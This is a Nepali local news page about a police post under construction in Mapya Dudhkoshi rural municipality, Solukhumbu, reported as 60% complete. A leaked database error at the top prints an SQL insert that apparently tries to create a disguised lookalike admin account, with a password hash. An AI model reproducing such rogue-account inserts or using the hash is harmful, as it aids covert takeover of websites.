WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEsPe.uJENw0UMWfOI4YNYJOrLYBY7/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 09:43:28', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु-मंसिर २, माप्य दुधकोशी गाउँपालिकामा निर्माणाधिन प्रहरी चौकी निर्माण कार्या तिब्र गतिमा अगाडि बढीरहेको छ । गाउँपालिकाको लगानीमा माप्य दुधकोशी ३, बासामा निर्माण भइरहेको उक्त भवनको काम ६० प्रतिशत पुरा भएको गाउँपालिका अध्यक्ष बुद्धिकिरण राईले बताउनु दिनुभयो ।
गाउँकार्यापालिकावाट बिनियोजित ५० लाख बजेटमा उक्त भवन निर्माण जारी रहेको हो । स्थानीयले उपलब्ध गराएको पाँच रोपनी जग्गामा गाउँपालिकाको लगानीमा साढे दुईतला रहने निर्माणाधिन भवनमा पाँचकोठा रहनेछन् ।
हाल किरात खालिङ राई संग्राहालय रहेको घरवाट प्रहरीले सेवा प्रवाह गरिरहेको छ । २०७२ सालको भुकम्पले पूर्ण क्षती भएको भवनबाट सेवा दिनुपर्दा निक्कै कठिन भएको कार्यरत प्रहरीको भनाई छ ।
जिल्लामानै गाउँपालिकाको बजेटबाट प्रहरी भवन निर्माण भएको यो पहिलो भएको गाउँपालिकाले दावी गरेको छ ।